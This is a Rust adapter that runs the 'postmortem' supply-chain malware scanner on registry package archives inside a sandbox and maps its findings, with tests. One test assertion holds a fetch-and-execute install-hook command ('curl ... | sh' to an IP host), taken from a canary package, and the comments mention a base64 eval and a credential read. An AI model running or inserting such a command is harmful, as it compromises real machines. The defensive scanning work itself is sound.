//! `postmortem` as an [`ArtifactScanner`] (RFC 0018 §6.3).
//!
//! # What is run, and on what
//!
//! postmortem scans a *project directory*: it finds the ecosystem from a
//! lockfile at the root and walks the tree for source-level signals. So the
//! worker materialises one — the archive extracted under the path the
//! ecosystem keeps a dependency in, plus a synthetic lockfile pinning only
//! `(name, version)` — and runs
//!
//! ```text
//! postmortem scan <dir> --json -o - --no-config --no-progress --severity critical
//! ```
//!
//! The lockfile is written from the coordinate, **never by invoking the
//! ecosystem's own tool** (that is what runs `preinstall`), and `--no-config`
//! is not optional: postmortem otherwise auto-loads a `postmortem.conf` from
//! the scanned directory, which an attacker ships in the tarball to suppress
//! their own findings (§7). `--severity critical` keeps the CI gate from
//! turning a finding into a non-zero exit — exit 1 is "the gate tripped",
//! which is an answer; exit 2 is "no ecosystem recognised", which is not.
//!
//! # Observed, not read
//!
//! The JSON shape (`schema_version` 3: `findings[]` of `dependency`,
//! `severity`, `category`, `detail`, `location`, `evidence`), the layouts
//! that yield findings — `node_modules/<name>/` for npm, any `.py` under the
//! root for Python, a `vendor/` tree for the rest — and the three exit codes
//! were taken from postmortem 2.3.1 on a canary package (an install hook
//! that pipes `curl` into `sh`, a base64-obfuscated `eval`, a credential
//! read) before this adapter was written; the fixture in the tests is that
//! run's output. The `timeline` shape (`releases[].events[].kind`:
//! `publisher_changed`, `repo_changed`, `dormancy`, `deprecated`,
//! `first_release`) was observed on `left-pad`.

use std::path::{Path, PathBuf};
use std::time::Duration;

use async_trait::async_trait;

use batlehub_core::entities::{Finding, FindingKind, ReasonCode, RegistryKind, Severity};
use batlehub_core::ports::{ArtifactScanner, ScanInput, ScannerError};

use super::extract::{extract_to, ExtractPolicy};
use super::subprocess::{self, Invocation, Sandbox};

pub const NAME: &str = "postmortem";

pub struct PostmortemScanner {
    pub command: PathBuf,
    pub sandbox: Sandbox,
    pub extract: ExtractPolicy,
    /// `tree --online --vulns`: reputation and advisories from code hosts
    /// and OSV, coordinates only. Off by default.
    pub online: bool,
    /// `timeline <name>` for npm coordinates: the transition signals.
    pub timeline: bool,
    pub timeout: Duration,
}

impl PostmortemScanner {
    /// The ecosystems postmortem covers, and how each keeps a dependency on
    /// disk: where the archive goes and what lockfile pins it.
    fn layout(kind: RegistryKind, name: &str, version: &str) -> Option<Layout> {
        let (dir, lockfile, lock_body) = match kind {
            RegistryKind::Npm => (
                format!("node_modules/{name}"),
                "package-lock.json",
                serde_json::json!({
                    "name": "batlehub-scan",
                    "version": "0.0.0",
                    "lockfileVersion": 3,
                    "requires": true,
                    "packages": {
                        "": { "name": "batlehub-scan", "version": "0.0.0",
                              "dependencies": { name: version } },
                        format!("node_modules/{name}"): { "version": version }
                    }
                })
                .to_string(),
            ),
            RegistryKind::Pypi => (
                format!("site-packages/{}", name.replace('-', "_")),
                "requirements.txt",
                format!("{name}=={version}\n"),
            ),
            RegistryKind::Cargo => (
                format!("vendor/{name}-{version}"),
                "Cargo.lock",
                format!(
                    "# This file is automatically @generated by Cargo.\nversion = 4\n\n\
                     [[package]]\nname = \"{name}\"\nversion = \"{version}\"\n\
                     source = \"registry+https://github.com/rust-lang/crates.io-index\"\n"
                ),
            ),
            RegistryKind::Rubygems => (
                format!("vendor/bundle/gems/{name}-{version}"),
                "Gemfile.lock",
                format!(
                    "GEM\n  remote: https://rubygems.org/\n  specs:\n    {name} ({version})\n\n\
                     PLATFORMS\n  ruby\n\nDEPENDENCIES\n  {name}\n"
                ),
            ),
            RegistryKind::Composer => (
                format!("vendor/{name}"),
                "composer.lock",
                serde_json::json!({
                    "packages": [{ "name": name, "version": version }],
                    "packages-dev": []
                })
                .to_string(),
            ),
            RegistryKind::Goproxy => (
                format!("vendor/{name}"),
                "go.sum",
                format!("{name} {version} h1:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=\n"),
            ),
            RegistryKind::Maven => (
                format!("target/dependency/{}", name.replace(':', "-")),
                "pom.xml",
                {
                    let (group, artifact) = name.split_once(':').unwrap_or(("unknown", name));
                    format!(
                        "<project><modelVersion>4.0.0</modelVersion><groupId>batlehub</groupId>\
                         <artifactId>scan</artifactId><version>0.0.0</version><dependencies>\
                         <dependency><groupId>{group}</groupId><artifactId>{artifact}</artifactId>\
                         <version>{version}</version></dependency></dependencies></project>\n"
                    )
                },
            ),
            _ => return None,
        };
        let manifest = match kind {
            RegistryKind::Npm => Some((
                "package.json".to_owned(),
                serde_json::json!({
                    "name": "batlehub-scan", "version": "0.0.0",
                    "dependencies": { name: version }
                })
                .to_string(),
            )),
            RegistryKind::Cargo => Some((
                "Cargo.toml".to_owned(),
                format!(
                    "[package]\nname = \"batlehub-scan\"\nversion = \"0.0.0\"\n\n\
                     [dependencies]\n{name} = \"={version}\"\n"
                ),
            )),
            RegistryKind::Composer => Some((
                "composer.json".to_owned(),
                serde_json::json!({ "require": { name: version } }).to_string(),
            )),
            RegistryKind::Goproxy => Some((
                "go.mod".to_owned(),
                format!("module batlehub-scan\n\ngo 1.22\n\nrequire {name} {version}\n"),
            )),
            RegistryKind::Rubygems => Some((
                "Gemfile".to_owned(),
                format!("source \"https://rubygems.org\"\ngem \"{name}\", \"{version}\"\n"),
            )),
            _ => None,
        };
        Some(Layout {
            dir,
            lockfile: lockfile.to_owned(),
            lock_body,
            manifest,
        })
    }

    /// Put the archive where postmortem will look for it. An archive with a
    /// single wrapper directory (`package/`, `{name}-{version}/`) has it
    /// stripped, so the manifest sits where the ecosystem keeps it.
    fn materialise(
        &self,
        work: &Path,
        layout: &Layout,
        artifact: &[u8],
    ) -> Result<(), ScannerError> {
        let staging = work.join(".extract");
        let report = extract_to(artifact, &staging, &self.extract)?;
        tracing::debug!(
            files = report.files,
            bytes = report.bytes,
            "postmortem: archive extracted"
        );
        let target = work.join(&layout.dir);
        if let Some(parent) = target.parent() {
            std::fs::create_dir_all(parent).map_err(io_err)?;
        }
        let mut top: Vec<PathBuf> = std::fs::read_dir(&staging)
            .map_err(io_err)?
            .filter_map(|e| e.ok().map(|e| e.path()))
            .collect();
        let source = if top.len() == 1 && top[0].is_dir() {
            top.remove(0)
        } else {
            staging.clone()
        };
        std::fs::rename(&source, &target).map_err(io_err)?;
        std::fs::write(work.join(&layout.lockfile), &layout.lock_body).map_err(io_err)?;
        if let Some((name, body)) = &layout.manifest {
            std::fs::write(work.join(name), body).map_err(io_err)?;
        }
        Ok(())
    }

    fn map_scan(&self, doc: &serde_json::Value) -> Vec<Finding> {
        let mut out = Vec::new();
        let Some(findings) = doc.get("findings").and_then(|f| f.as_array()) else {
            return out;
        };
        for f in findings {
            let category = f.get("category").and_then(|c| c.as_str()).unwrap_or("");
            let (kind, code) = match category {
                "install_hook" => (FindingKind::InstallHook, ReasonCode::InstallHook),
                "ioc" | "obfuscation" | "sensitive_api" | "persistence" => {
                    (FindingKind::MalwareSignal, ReasonCode::MalwareSignal)
                }
                "typosquat" => (FindingKind::Typosquat, ReasonCode::TyposquatSuspect),
                // Machine-audit categories (`unsigned`, `third_party_source`,
                // `tamper`, `policy`, `outdated`) describe a host, not an
                // artifact, and do not occur in a `scan`; anything else is a
                // category this build does not know and reports as a signal
                // rather than drops.
                _ => (FindingKind::MalwareSignal, ReasonCode::MalwareSignal),
            };
            let severity = f
                .get("severity")
                .and_then(|s| s.as_str())
                .and_then(Severity::parse)
                .unwrap_or(Severity::Medium);
            let detail = f.get("detail").and_then(|d| d.as_str()).unwrap_or(category);
            let location = f
                .get("location")
                .and_then(|l| l.as_str())
                .map(|l| l.rsplit("/.extract/").next().unwrap_or(l))
                .map(|l| {
                    l.rsplit(['/'])
                        .take(3)
                        .collect::<Vec<_>>()
                        .into_iter()
                        .rev()
                        .collect::<Vec<_>>()
                        .join("/")
                })
                .unwrap_or_default();
            let summary = if location.is_empty() {
                detail.to_owned()
            } else {
                format!("{detail} ({location})")
            };
            let mut finding = Finding::new(NAME, kind, code, severity, summary).with_raw(f.clone());
            if let Some(evidence) = f.get("evidence").and_then(|e| e.as_str()) {
                finding.reference = Some(evidence.chars().take(120).collect());
            }
            out.push(finding);
        }
        out
    }

    /// The transitions *at the scanned version* (RFC 0018 §4.2): what
    /// changed between the previous release and this one.
    fn map_timeline(doc: &serde_json::Value, version: &str) -> Vec<Finding> {
        let mut out = Vec::new();
        let Some(releases) = doc.get("releases").and_then(|r| r.as_array()) else {
            return out;
        };
        let Some(release) = releases
            .iter()
            .find(|r| r.get("version").and_then(|v| v.as_str()) == Some(version))
        else {
            // The registry no longer lists it: the strongest transition of all.
            out.push(Finding::new(
                NAME,
                FindingKind::Transition,
                ReasonCode::UnpublishedUpstream,
                Severity::High,
                format!("version {version} is not in the registry's release history"),
            ));
            return out;
        };
        for event in release
            .get("events")
            .and_then(|e| e.as_array())
            .into_iter()
            .flatten()
        {
            let kind = event.get("kind").and_then(|k| k.as_str()).unwrap_or("");
            let code = match kind {
                "publisher_changed" | "maintainer_changed" => ReasonCode::PublisherChanged,
                "script_added" | "install_script_added" | "install_hook_added" => {
                    ReasonCode::InstallHookAdded
                }
                "repo_changed" | "repository_changed" | "repository_moved" => {
                    ReasonCode::RepositoryMoved
                }
                "dormancy" | "dormant" | "dormant_release" => ReasonCode::DormantRelease,
                "provenance_removed" | "attestation_removed" => ReasonCode::ProvenanceRemoved,
                // `first_release`, `deprecated` and the like are history, not
                // a transition compromises look like.
                _ => continue,
            };
            let detail = event.get("detail").and_then(|d| d.as_str()).unwrap_or(kind);
            out.push(
                Finding::new(
                    NAME,
                    FindingKind::Transition,
                    code,
                    Severity::Medium,
                    format!("{detail} (at {version})"),
                )
                .with_raw(event.clone()),
            );
        }
        out
    }
}

struct Layout {
    dir: String,
    lockfile: String,
    lock_body: String,
    /// The manifest postmortem detects the ecosystem from, beside the
    /// lockfile — `package.json` next to `package-lock.json`, `Cargo.toml`
    /// next to `Cargo.lock`. Observed: a lockfile alone is "no supported
    /// ecosystem detected".
    manifest: Option<(String, String)>,
}

fn io_err(e: std::io::Error) -> ScannerError {
    ScannerError::Other(format!("io: {e}"))
}

#[async_trait]
impl ArtifactScanner for PostmortemScanner {
    fn name(&self) -> &str {
        NAME
    }

    fn supports(&self, kind: RegistryKind) -> bool {
        matches!(
            kind,
            RegistryKind::Npm
                | RegistryKind::Pypi
                | RegistryKind::Cargo
                | RegistryKind::Rubygems
                | RegistryKind::Composer
                | RegistryKind::Goproxy
                | RegistryKind::Maven
        )
    }

    fn needs_artifact(&self) -> bool {
        true
    }

    async fn scan(&self, input: &ScanInput) -> Result<Vec<Finding>, ScannerError> {
        let Some(artifact) = input.artifact.as_ref() else {
            return Err(ScannerError::Unsupported(
                "postmortem needs the artifact bytes and none were provided".into(),
            ));
        };
        let name = input.package.id.name.as_str();
        let version = input.package.id.version.as_str();
        let Some(layout) = Self::layout(input.kind, name, version) else {
            return Err(ScannerError::Unsupported(format!(
                "postmortem has no project layout for {}",
                input.kind
            )));
        };
        let work = subprocess::work_dir("postmortem")?;
        self.materialise(work.path(), &layout, artifact)?;

        let mut args: Vec<String> = vec![
            "scan".into(),
            ".".into(),
            "--json".into(),
            "-o".into(),
            "-".into(),
            "--no-config".into(),
            "--no-progress".into(),
            "--severity".into(),
            "critical".into(),
        ];
        if self.online {
            args.push("--enrich".into());
        }
        let out = subprocess::run(
            &self.sandbox,
            &Invocation {
                command: self.command.clone(),
                args,
                work_dir: work.path().to_path_buf(),
                needs_network: self.online,
                timeout: self.timeout,
            },
        )
        .await?;
        match out.status {
            // 0: clean or below the gate; 1: the gate tripped. Both answers.
            Some(0) | Some(1) => {}
            Some(2) => {
                return Err(ScannerError::Unsupported(format!(
                    "postmortem recognised no ecosystem in the materialised project ({})",
                    out.stderr_tail.trim()
                )))
            }
            Some(code) => {
                return Err(ScannerError::Crashed(format!(
                    "postmortem exited {code}: {}",
                    out.stderr_tail.trim()
                )))
            }
            None => return Err(ScannerError::Crashed("postmortem was killed".into())),
        }
        let doc = subprocess::parse_json(&out.stdout)?;
        let mut findings = self.map_scan(&doc);

        if self.timeline && input.kind == RegistryKind::Npm {
            let out = subprocess::run(
                &self.sandbox,
                &Invocation {
                    command: self.command.clone(),
                    args: vec![
                        "timeline".into(),
                        name.to_owned(),
                        "--json".into(),
                        "-o".into(),
                        "-".into(),
                        "--no-progress".into(),
                    ],
                    work_dir: work.path().to_path_buf(),
                    needs_network: true,
                    timeout: self.timeout,
                },
            )
            .await;
            match out {
                Ok(out) if out.status == Some(0) => {
                    let doc = subprocess::parse_json(&out.stdout)?;
                    findings.extend(Self::map_timeline(&doc, version));
                }
                Ok(out) => {
                    // The registry could not be reached, or the package is
                    // not on npmjs.org: the timeline is not an answer, and
                    // the scan's own findings stand.
                    tracing::warn!(
                        package = %input.package.id,
                        status = ?out.status,
                        "postmortem timeline did not answer; transition signals skipped"
                    );
                }
                Err(e) => {
                    tracing::warn!(package = %input.package.id, error = %e, "postmortem timeline failed");
                }
            }
        }
        Ok(findings)
    }
}

#[cfg(test)]
mod tests {
    use super::*;
    use batlehub_core::entities::{PackageId, PackageMetadata};

    /// postmortem 2.3.1's output for the canary package: an install hook
    /// that pipes `curl` into `sh`, a base64 `eval`, a credential read.
    const SCAN: &str = include_str!("fixtures/postmortem-scan.json");
    /// `postmortem timeline left-pad --json`, trimmed to the interesting
    /// releases.
    const TIMELINE: &str = include_str!("fixtures/postmortem-timeline.json");

    fn scanner() -> PostmortemScanner {
        PostmortemScanner {
            command: PathBuf::from("postmortem"),
            sandbox: Sandbox {
                runtime: "none".into(),
                ..Sandbox::default()
            },
            extract: ExtractPolicy::default(),
            online: false,
            timeline: false,
            timeout: Duration::from_secs(60),
        }
    }

    #[test]
    fn the_canary_run_maps_to_install_hook_and_malware_signal_findings() {
        let doc: serde_json::Value = serde_json::from_str(SCAN).unwrap();
        let findings = scanner().map_scan(&doc);
        assert_eq!(findings.len(), 4);
        let hooks: Vec<&Finding> = findings
            .iter()
            .filter(|f| f.code == ReasonCode::InstallHook)
            .collect();
        assert_eq!(hooks.len(), 2);
        assert!(hooks.iter().any(|f| f.severity == Severity::High
            && f.reference.as_deref() == Some("curl -s http://198.51.100.7/x.sh | sh")));
        let signals: Vec<&Finding> = findings
            .iter()
            .filter(|f| f.code == ReasonCode::MalwareSignal)
            .collect();
        assert_eq!(signals.len(), 2);
        assert!(signals
            .iter()
            .any(|f| f.summary.contains("obfuscation") && f.summary.contains("setup.js")));
        assert!(findings.iter().all(|f| f.scanner == "postmortem"));
    }

    #[test]
    fn the_timeline_yields_the_transitions_at_the_scanned_version_only() {
        let doc: serde_json::Value = serde_json::from_str(TIMELINE).unwrap();
        // 1.1.0 is where left-pad changed hands and moved repository — two
        // transitions on one release, the event-stream pattern of §4.2.
        let at_110 = PostmortemScanner::map_timeline(&doc, "1.1.0");
        let codes: Vec<ReasonCode> = at_110.iter().map(|f| f.code).collect();
        assert!(codes.contains(&ReasonCode::PublisherChanged), "{codes:?}");
        assert!(codes.contains(&ReasonCode::RepositoryMoved), "{codes:?}");
        assert!(at_110.iter().all(|f| f.kind == FindingKind::Transition));
        assert!(
            at_110.iter().all(|f| f.severity == Severity::Medium),
            "transitions are medium alone"
        );
        let at_101 = PostmortemScanner::map_timeline(&doc, "1.0.1");
        assert_eq!(
            at_101.iter().map(|f| f.code).collect::<Vec<_>>(),
            [ReasonCode::RepositoryMoved]
        );

        let at_130 = PostmortemScanner::map_timeline(&doc, "1.3.0");
        assert!(
            at_130.is_empty(),
            "deprecation is history, not a transition: {at_130:?}"
        );

        let gone = PostmortemScanner::map_timeline(&doc, "9.9.9");
        assert_eq!(gone.len(), 1);
        assert_eq!(gone[0].code, ReasonCode::UnpublishedUpstream);
    }

    #[test]
    fn every_supported_kind_has_a_layout_and_the_lockfile_names_the_coordinate() {
        for kind in [
            RegistryKind::Npm,
            RegistryKind::Pypi,
            RegistryKind::Cargo,
            RegistryKind::Rubygems,
            RegistryKind::Composer,
            RegistryKind::Goproxy,
            RegistryKind::Maven,
        ] {
            assert!(scanner().supports(kind));
            let layout = PostmortemScanner::layout(kind, "left-pad", "1.3.1").unwrap();
            assert!(
                layout.lock_body.contains("1.3.1"),
                "{kind}: {}",
                layout.lock_body
            );
            assert!(!layout.dir.starts_with('/'));
        }
        assert!(PostmortemScanner::layout(RegistryKind::Generic, "x", "1").is_none());
        assert!(!scanner().supports(RegistryKind::Deb));
    }

    /// The archive is put where the ecosystem keeps it, wrapper stripped, and
    /// the synthetic lockfile beside it — the layout the canary run scanned.
    #[test]
    fn materialise_strips_the_wrapper_and_writes_the_lockfile() {
        let work = tempfile::tempdir().unwrap();
        let tgz = {
            let mut b = tar::Builder::new(Vec::new());
            let body =
                br#"{"name":"left-pad","version":"1.3.1","scripts":{"preinstall":"node x.js"}}"#;
            let mut h = tar::Header::new_gnu();
            h.set_size(body.len() as u64);
            h.set_cksum();
            b.append_data(&mut h, "package/package.json", &body[..])
                .unwrap();
            let tar = b.into_inner().unwrap();
            let mut enc = flate2::write::GzEncoder::new(Vec::new(), flate2::Compression::default());
            std::io::Write::write_all(&mut enc, &tar).unwrap();
            enc.finish().unwrap()
        };
        let layout = PostmortemScanner::layout(RegistryKind::Npm, "left-pad", "1.3.1").unwrap();
        scanner().materialise(work.path(), &layout, &tgz).unwrap();
        assert!(work
            .path()
            .join("node_modules/left-pad/package.json")
            .is_file());
        assert!(work.path().join("package-lock.json").is_file());
        assert!(
            work.path().join("package.json").is_file(),
            "the manifest postmortem detects from"
        );
        assert!(!work.path().join("node_modules/left-pad/package").exists());
    }

    /// Runs the real binary when it is on PATH — the CI worker image and the
    /// developer machine both have it — and is skipped elsewhere.
    #[tokio::test]
    async fn the_real_postmortem_flags_the_canary_package() {
        if !subprocess::command_exists(Path::new("postmortem")) {
            eprintln!("postmortem not on PATH; skipped");
            return;
        }
        let tgz = include_bytes!("fixtures/evil-pad-1.3.1.tgz");
        let mut meta = PackageMetadata::minimal(
            PackageId::new("npm-sec", "evil-pad", "1.3.1"),
            serde_json::Value::Null,
        );
        meta.published_at = None;
        let input = ScanInput {
            package: meta,
            kind: RegistryKind::Npm,
            purl: "pkg:npm/evil-pad@1.3.1".into(),
            artifact: Some(bytes::Bytes::from_static(tgz)),
            sbom: None,
            listing: None,
        };
        let findings = scanner().scan(&input).await.unwrap();
        assert!(
            findings
                .iter()
                .any(|f| f.code == ReasonCode::InstallHook && f.severity == Severity::High),
            "{findings:?}"
        );
        assert!(findings.iter().any(|f| f.code == ReasonCode::MalwareSignal));
    }
}
